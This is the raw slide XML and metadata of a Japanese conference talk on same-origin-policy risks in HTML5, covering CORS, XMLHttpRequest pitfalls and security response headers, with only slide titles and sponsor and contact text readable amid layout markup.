              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を真に常時 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>にする話 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>Cybozu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> Inside Out | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サイボウズエンジニアのブログ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400" b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http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://developer.cybozu.co.jp/tech/?p=6096</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" b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60327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今日の話題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526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質問</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>タイム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3600" dirty="0" smtClean="0"/>
              <a:t>Question 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9835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smtClean="0"/>
              <a:t>Question?  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8EB4E3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>質問</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="8EB4E3"/>
              </a:solidFill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971600" y="1484784"/>
            <a:ext cx="7499176" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>hasegawa@utf-8.jp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>hasegawa@netagent.co.jp</a:t>
            </a:r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@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>hasegawayosuke</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>http://utf-8.jp/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24944"/>
            <a:ext cx="648072" cy="648072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56792"/>
            <a:ext cx="648072" cy="648072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="グループ化 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="780290" y="4040001"/>
            <a:ext cx="504056" cy="504056"/>
            <a:chOff x="539552" y="4005064"/>
            <a:chExt cx="792088" cy="792088"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="角丸四角形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="539552" y="4005064"/>
              <a:ext cx="792088" cy="792088"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect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8" name="グループ化 27"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="648631" y="4132198"/>
              <a:ext cx="576064" cy="458081"/>
              <a:chOff x="6948264" y="2204864"/>
              <a:chExt cx="1152128" cy="916161"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="11" name="直線コネクタ 10"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7524328" y="2204864"/>
                <a:ext cx="576064" cy="648072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/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="7884368" y="2616969"/>
                <a:ext cx="8384" cy="504056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/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7164288" y="3121025"/>
                <a:ext cx="720080" cy="0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/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="7769625" y="2268325"/>
                <a:ext cx="8384" cy="216024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線コネクタ 24"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6948264" y="2204864"/>
                <a:ext cx="576064" cy="648072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線コネクタ 25"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7155904" y="2616969"/>
                <a:ext cx="8384" cy="504056"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="bg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654548"/>
            <a:ext cx="3744416" cy="609557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233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60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0" y="1826920"/>
            <a:ext cx="9144000" cy="936104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="6600" dirty="0" smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>提供</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="8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-4584" y="2852936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  <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>OWASP Japan</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="6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0" y="4221088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  <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>Code Blue</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="6000" dirty="0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0" y="3325396"/>
            <a:ext cx="91440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1" sz="4400" b="1" kern="1200" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" err="1" smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t> APAC 2014</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="4800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63361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今日</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>話題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-36512" y="1340768"/>
            <a:ext cx="8229600" cy="5040560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HTML5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>時代の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>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>破り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ブラウザの高機能化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>表現力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、速度の向上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JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>コード量の増加</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻撃者対象も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ブラウザ上へ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SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>破りの受動的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en-US" dirty="0" smtClean="0"/>
              <a:t>攻撃が増加</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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685" y="903907"/>
            <a:ext cx="4846487" cy="5693445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293" y="2636912"/>
            <a:ext cx="432048" cy="43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96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今日の話題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オリジンの話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オリジン </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>同一オリジンポリシー</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t> / C</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>ORS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>意図</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>せずクロスオリジン通信→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>意図せずクロスオリジン通信→データ漏えい</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>データを悪用して</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>データ内の機密情報漏えい</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>セキュリティ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>関係のレスポンス</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ヘッダ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17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オリジンの話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63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20000"/>
            <a:lumOff val="80000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="12700">
          <a:solidFill>
            <a:schemeClr val="tx2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tlCol="0" anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr kumimoji="1"/>
        </a:defPPr>
      </a:lstStyle>
      <a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2063</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>画面に合わせる (4:3)</PresentationFormat>
  <Paragraphs>478</Paragraphs>
  <Slides>62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62</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="72" baseType="lpstr">
      <vt:lpstr>ＭＳ ゴシック</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Meiryo UI</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>メイリオ</vt:lpstr>
      <vt:lpstr>HGP創英ﾌﾟﾚｾﾞﾝｽEB</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office テーマ</vt:lpstr>
      <vt:lpstr>Bypass SOP in a time of HTML5</vt:lpstr>
      <vt:lpstr>自己紹介</vt:lpstr>
      <vt:lpstr>提供</vt:lpstr>
      <vt:lpstr> お知らせ</vt:lpstr>
      <vt:lpstr>HTML5 調査報告 from JPCERT/CC</vt:lpstr>
      <vt:lpstr>今日の話題</vt:lpstr>
      <vt:lpstr>今日の話題</vt:lpstr>
      <vt:lpstr>今日の話題</vt:lpstr>
      <vt:lpstr>オリジンの話</vt:lpstr>
      <vt:lpstr>オリジンとは</vt:lpstr>
      <vt:lpstr>同一オリジンポリシー</vt:lpstr>
      <vt:lpstr>Cross-Origin Resource Sharing</vt:lpstr>
      <vt:lpstr>XHR with CORS</vt:lpstr>
      <vt:lpstr>XHR with CORS</vt:lpstr>
      <vt:lpstr>Images with CORS</vt:lpstr>
      <vt:lpstr>Images with CORS</vt:lpstr>
      <vt:lpstr>Access-Control-Allow-Origin</vt:lpstr>
      <vt:lpstr>ここまでのまとめ</vt:lpstr>
      <vt:lpstr>XMLHttpRequest</vt:lpstr>
      <vt:lpstr>XMLHttpRequest</vt:lpstr>
      <vt:lpstr>XMLHttpRequest (1)意図せずクロスオリジン通信→XSS</vt:lpstr>
      <vt:lpstr>XHR: 意図せずクロスオリジン通信→XSS</vt:lpstr>
      <vt:lpstr>XHR: 意図せずクロスオリジン通信→XSS</vt:lpstr>
      <vt:lpstr>XMLHttpRequest (2)意図せずクロスオリジン通信→データ漏えい</vt:lpstr>
      <vt:lpstr>XHR: 意図せずクロスオリジン通信→データ漏えい</vt:lpstr>
      <vt:lpstr>XHR: 意図せずクロスオリジン通信→データ漏えい</vt:lpstr>
      <vt:lpstr>XHR: 意図せずクロスオリジン通信→データ漏えい</vt:lpstr>
      <vt:lpstr>XMLHttpRequest (3)Ajaxデータを使ったXSS</vt:lpstr>
      <vt:lpstr>XHR: Ajaxデータを使ったXSS</vt:lpstr>
      <vt:lpstr>XHR: Ajaxデータを使ったXSS</vt:lpstr>
      <vt:lpstr>XHR: Ajaxデータを使ったXSS</vt:lpstr>
      <vt:lpstr>XMLHttpRequest (4)Ajaxデータ内の機密情報漏えい</vt:lpstr>
      <vt:lpstr>XHR: Ajaxデータ内の機密情報漏えい</vt:lpstr>
      <vt:lpstr>XHR: Ajaxデータ内の機密情報漏えい</vt:lpstr>
      <vt:lpstr>XHR: Ajaxデータ内の機密情報漏えい</vt:lpstr>
      <vt:lpstr>XHR: Ajaxデータ内の機密情報漏えい</vt:lpstr>
      <vt:lpstr>セキュリティ関係のレスポンスヘッダ</vt:lpstr>
      <vt:lpstr>セキュリティ関係のレスポンスヘッダ</vt:lpstr>
      <vt:lpstr>セキュリティ関係のレスポンスヘッダ X-XSS-Protection</vt:lpstr>
      <vt:lpstr>X-XSS-Protection</vt:lpstr>
      <vt:lpstr>X-XSS-Protection</vt:lpstr>
      <vt:lpstr>X-XSS-Protection</vt:lpstr>
      <vt:lpstr>セキュリティ関係のレスポンスヘッダ X-Content-Type-Options</vt:lpstr>
      <vt:lpstr>X-Content-Type-Options</vt:lpstr>
      <vt:lpstr>X-Content-Type-Options</vt:lpstr>
      <vt:lpstr>セキュリティ関係のレスポンスヘッダ X-Frame-Options</vt:lpstr>
      <vt:lpstr>X-Frame-Options</vt:lpstr>
      <vt:lpstr>X-Frame-Options</vt:lpstr>
      <vt:lpstr>X-Frame-Options</vt:lpstr>
      <vt:lpstr>X-Frame-Options</vt:lpstr>
      <vt:lpstr>セキュリティ関係のレスポンスヘッダ Content-Security-Policy</vt:lpstr>
      <vt:lpstr>Content-Security-Policy</vt:lpstr>
      <vt:lpstr>セキュリティ関係のレスポンスヘッダ X-Download-Options</vt:lpstr>
      <vt:lpstr>X-Download-Options</vt:lpstr>
      <vt:lpstr>X-Download-Options</vt:lpstr>
      <vt:lpstr>セキュリティ関係のレスポンスヘッダ Strict-Transport-Security</vt:lpstr>
      <vt:lpstr>Strict-Transport-Security</vt:lpstr>
      <vt:lpstr>Strict-Transport-Security</vt:lpstr>
      <vt:lpstr>Strict-Transport-Security</vt:lpstr>
      <vt:lpstr>質問タイム Question ?</vt:lpstr>
      <vt:lpstr>Question?  質問</vt:lpstr>
      <vt:lpstr>提供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2011-10-18T10:13:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-02-04T08:07:10Z</dcterms:modified>
</cp:coreProperties>
</file>